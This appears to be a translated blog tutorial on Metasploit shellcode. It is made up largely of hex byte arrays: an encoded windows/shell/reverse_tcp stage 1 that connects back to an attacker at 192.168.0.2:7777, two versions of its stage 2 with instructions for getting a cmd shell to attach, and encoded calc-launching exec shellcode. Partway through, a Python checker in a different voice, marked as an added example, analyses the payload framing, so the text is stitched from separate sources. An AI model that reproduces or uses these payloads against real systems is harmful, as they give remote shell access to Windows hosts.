# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LHOST=192.168.0.2, LPORT=7777, 
# ReverseConnectRetries=5, ReverseAllowProxy=false, 
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf = 
"\xba\x6d\x92\x9b\x46\xdb\xd2\xd9\x74\x24\xf4\x58\x33\xc9"  
"\xb1\x49\x31\x50\x14\x83\xe8\xfc\x03\x50\x10\x8f\x67\x67"  
"\xae\xc6\x88\x98\x2f\xb8\x01\x7d\x1e\xea\x76\xf5\x33\x3a"  
"\xfc\x5b\xb8\xb1\x50\x48\x4b\xb7\x7c\x7f\xfc\x7d\x5b\x4e"  
"\xfd\xb0\x63\x1c\x3d\xd3\x1f\x5f\x12\x33\x21\x90\x67\x32"  
"\x66\xcd\x88\x66\x3f\x99\x3b\x96\x34\xdf\x87\x97\x9a\x6b"  
"\xb7\xef\x9f\xac\x4c\x45\xa1\xfc\xfd\xd2\xe9\xe4\x76\xbc"  
"\xc9\x15\x5a\xdf\x36\x5f\xd7\x2b\xcc\x5e\x31\x62\x2d\x51"  
"\x7d\x28\x10\x5d\x70\x31\x54\x5a\x6b\x44\xae\x98\x16\x5e"  
"\x75\xe2\xcc\xeb\x68\x44\x86\x4b\x49\x74\x4b\x0d\x1a\x7a"  
"\x20\x5a\x44\x9f\xb7\x8f\xfe\x9b\x3c\x2e\xd1\x2d\x06\x14"  
"\xf5\x76\xdc\x35\xac\xd2\xb3\x4a\xae\xbb\x6c\xee\xa4\x2e"  
"\x78\x88\xe6\x26\x4d\xa6\x18\xb7\xd9\xb1\x6b\x85\x46\x69"  
"\xe4\xa5\x0f\xb7\xf3\xca\x25\x0f\x6b\x35\xc6\x6f\xa5\xf2"  
"\x92\x3f\xdd\xd3\x9a\xd4\x1d\xdb\x4e\x7a\x4e\x73\x21\x3a"  
"\x3e\x33\x91\xd2\x54\xbc\xce\xc2\x56\x16\x67\x68\xac\xf1"  
"\x48\xc4\xae\x03\x21\x16\xaf\x1d\xd0\x9f\x49\x4b\x02\xc9"  
"\xc2\xe4\xbb\x50\x98\x95\x44\x4f\xe4\x96\xcf\x63\x18\x58"  
"\x38\x0e\x0a\x0d\xc8\x45\x70\x98\xd7\x70\x1f\x25\x42\x7e"  
"\xb6\x72\xfa\x7c\xef\xb5\xa5\x7f\xda\xcd\x6c\x15\xa5\xb9"  
"\x90\xf9\x25\x3a\xc7\x93\x25\x52\xbf\xc7\x75\x47\xc0\xd2"  
"\xe9\xd4\x55\xdc\x5b\x88\xfe\xb4\x61\xf7\xc9\x1b\x99\xd2"  
"\xcb\x60\x4c\x1b\x4e\x90\xfa\x4f\x92"

# windows/shell/reverse_tcp - 240 bytes (stage 2)
# http://www.metasploit.com
buf = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"  
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"  
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"  
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"  
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"  
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff"  
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d"  
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b"  
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"  
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"  
"\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"  
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01"  
"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46"  
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"  
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb"  
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"  
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"  
"\xff\xd5"


There is another reason I chose reverse_tcp this time.


Part of it was slightly wrong and I wasted a lot of time on it. So I chose this shellcode so that others don't have to go through the same thing.




If you use the shellcode with metasploit's handler it does not matter, but when not using metasploit a small problem comes up.


First, reverse_tcp is split into 2 parts: stage1 is the shellcode that makes the client connect to the server, and stage2 is the code that the server sends to open a cmd shell on the client.


But the stage2 shown above did not work, and I don't know why..


After several hours of trial and error, what I found is: throw away that stage2 value and use the code below.


When the reverse_tcp payload is used with metasploit's handler, the handler sends stage2, and the value it uses then is slightly different from the stage2 shown above.


So use the stage2 that the handler sends.


To sum it up in one line: when using reverse_tcp, do not use the stage2 value above; use the code below.


#stage 2 [metasploit handler_windows/shell/reverse_tcp]

"\xF0\x00\x00\x00\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64"

"\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26"

"\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7"

"\xE2\xF0\x52\x57\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85"

"\xC0\x74\x4A\x01\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C"

"\x49\x8B\x34\x8B\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7"

"\x38\xE0\x75\xF4\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24"

"\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0"

"\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B"

"\x12\xEB\x86\x5D\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31\xF6"

"\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44\x24"

"\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53\x56"

"\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68\x08"

"\x87\x1D\x60\xFF\xD5\xBB\xF0\xB5\xA2\x56\x68\xA6\x95\xBD\x9D\xFF"

"\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A"

"\x00\x53\xFF\xD5"


To repeat: with reverse_tcp, stage1 is what you use when attacking the vulnerability, and stage2 is the value that the server sends to the client in the second step.


Once the client has connected to the server via stage1, send the code above and you will see the shell attach successfully.


I hope this helps those who struggled like I did.. haha




OK.. now let's make shellcode that pops the calculator once more.


I will just write it out as plain text.
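The two things worth checking before trusting pasted `generate` output are the bad-char rule from the `-b` section and the stage 1 / stage 2 split described just above. The script below is an added example (not code from the post or from Metasploit): it parses the `buf = ...` text that `generate` prints, confirms the byte count against the header comment, lists which of the `-b` bad chars still occur, and compares the post's stage 2 against the stage 2 captured from the handler. The only difference between those two blobs is a 4-byte little-endian length prefix (`\xF0\x00\x00\x00` is 240, the size of the stage), which is the framing the reverse_tcp stager expects before the stage itself; the sample input is the post's own stage 2 and handler bytes, embedded here as constructed test data.

```python
"""Check msfconsole `generate` output and the reverse_tcp stage 2 framing.

Added example, not code from the original post or from Metasploit.
"""
import re
import struct

# Constructed sample input: the stage 2 block as `generate -b '\xff\x00'`
# printed it in the post.  A raw string keeps the \x escapes as literal
# text, i.e. what a pasted shellcode.txt actually contains.
GENERATE_OUTPUT = r'''
# windows/shell/reverse_tcp - 240 bytes (stage 2)
# http://www.metasploit.com
buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff"
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d"
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
"\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01"
"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46"
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb"
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\xff\xd5"
'''

# Constructed sample input: the stage 2 the post captured from the handler.
HANDLER_STAGE2 = bytes.fromhex(
    "F0000000FCE8890000006089E531D264" "8B52308B520C8B52148B72280FB74A26"
    "31FF31C0AC3C617C022C20C1CF0D01C7" "E2F052578B52108B423C01D08B407885"
    "C0744A01D0508B48188B582001D3E33C" "498B348B01D631FF31C0ACC1CF0D01C7"
    "38E075F4037DF83B7D2475E2588B5824" "01D3668B0C4B8B581C01D38B048B01D0"
    "894424245B5B61595A51FFE0585F5A8B" "12EB865D68636D640089E357575731F6"
    "6A125956E2FD66C744243C01018D4424" "10C60044545056565646564E56565356"
    "6879CC3F86FFD589E04E5646FF306808" "871D60FFD5BBF0B5A25668A695BD9DFF"
    "D53C067C0A80FBE07505BB4713726F6A" "0053FFD5"
)

HEADER_RE = re.compile(r"^#\s*(\S+)\s*-\s*(\d+)\s*bytes", re.MULTILINE)
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_generate_output(text):
    """Return (payload name, declared size, bytes) from `generate` text."""
    m = HEADER_RE.search(text)
    if m is None:
        raise ValueError("no '# <payload> - N bytes' header line found")
    start = text.find("buf", m.end())
    if start < 0:
        raise ValueError("no 'buf =' block found after the header")
    buf = bytes(int(h, 16) for h in HEX_RE.findall(text[start:]))
    return m.group(1), int(m.group(2)), buf


def find_bad_chars(buf, badchars):
    """Set of byte values from `badchars` that still occur in `buf`."""
    return {b for b in badchars if b in buf}


def frame_stage(stage):
    """Prefix a stage with its 4-byte little-endian length, the framing the
    reverse_tcp handler puts in front of stage 2 before sending it."""
    return struct.pack("<I", len(stage)) + stage


def unframe_stage(blob):
    """Inverse of frame_stage; rejects a blob whose prefix and body disagree."""
    if len(blob) < 4:
        raise ValueError("blob shorter than the 4-byte length prefix")
    (n,) = struct.unpack("<I", blob[:4])
    stage = blob[4:]
    if len(stage) != n:
        raise ValueError(f"length prefix says {n} bytes, got {len(stage)}")
    return stage


PAYLOAD, DECLARED_SIZE, STAGE2 = parse_generate_output(GENERATE_OUTPUT)


def report():
    """The checks a practitioner would run on pasted `generate` output."""
    return {
        "payload": PAYLOAD,
        "size_ok": len(STAGE2) == DECLARED_SIZE,
        "bad_chars_present": sorted(find_bad_chars(STAGE2, b"\xff\x00")),
        "matches_handler": frame_stage(STAGE2) == HANDLER_STAGE2,
    }


if __name__ == "__main__":
    for key, value in report().items():
        print(f"{key}: {value}")
```

Two results are instructive. `bad_chars_present` is `[0, 255]` even though `-b '\xff\x00'` was given: the encoder only touches stage 1, the part that travels through the vulnerable input, while stage 2 is sent over the already-open socket and is left as-is. And `matches_handler` is `True`, so the "slightly different" handler blob is exactly the generated stage 2 behind its length prefix. From a detection standpoint that framing (a fresh outbound connection, then a 4-byte length immediately followed by a stage of that length) is what network signatures for this stager key on.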


msf > use windows/exec
msf  payload(exec) > show options

Module options (payload/windows/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none

msf  payload(exec) > set cmd calc
cmd => calc
msf  payload(exec) > generate -b '\xff\x00'
# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, EXITFUNC=process, CMD=calc
buf = 
"\xdb\xca\xd9\x74\x24\xf4\x5b\xba\x23\xf7\xca\x19\x2b\xc9"  
"\xb1\x32\x31\x53\x17\x03\x53\x17\x83\xc8\x0b\x28\xec\xf2"  
"\x1c\x24\x0f\x0a\xdd\x57\x99\xef\xec\x45\xfd\x64\x5c\x5a"  
"\x75\x28\x6d\x11\xdb\xd8\xe6\x57\xf4\xef\x4f\xdd\x22\xde"  
"\x50\xd3\xea\x8c\x93\x75\x97\xce\xc7\x55\xa6\x01\x1a\x97"  
"\xef\x7f\xd5\xc5\xb8\xf4\x44\xfa\xcd\x48\x55\xfb\x01\xc7"  
"\xe5\x83\x24\x17\x91\x39\x26\x47\x0a\x35\x60\x7f\x20\x11"  
"\x51\x7e\xe5\x41\xad\xc9\x82\xb2\x45\xc8\x42\x8b\xa6\xfb"  
"\xaa\x40\x99\x34\x27\x98\xdd\xf2\xd8\xef\x15\x01\x64\xe8"  
"\xed\x78\xb2\x7d\xf0\xda\x31\x25\xd0\xdb\x96\xb0\x93\xd7"  
"\x53\xb6\xfc\xfb\x62\x1b\x77\x07\xee\x9a\x58\x8e\xb4\xb8"  
"\x7c\xcb\x6f\xa0\x25\xb1\xde\xdd\x36\x1d\xbe\x7b\x3c\x8f"  
"\xab\xfa\x1f\xc5\x2a\x8e\x25\xa0\x2d\x90\x25\x82\x45\xa1"  
"\xae\x4d\x11\x3e\x65\x2a\xed\x74\x24\x1a\x66\xd1\xbc\x1f"  
"\xeb\xe2\x6a\x63\x12\x61\x9f\x1b\xe1\x79\xea\x1e\xad\x3d"  
"\x06\x52\xbe\xab\x28\xc1\xbf\xf9\x4a\x84\x53\x61\x8d"


Thanks for reading this long post.


Thank you :D
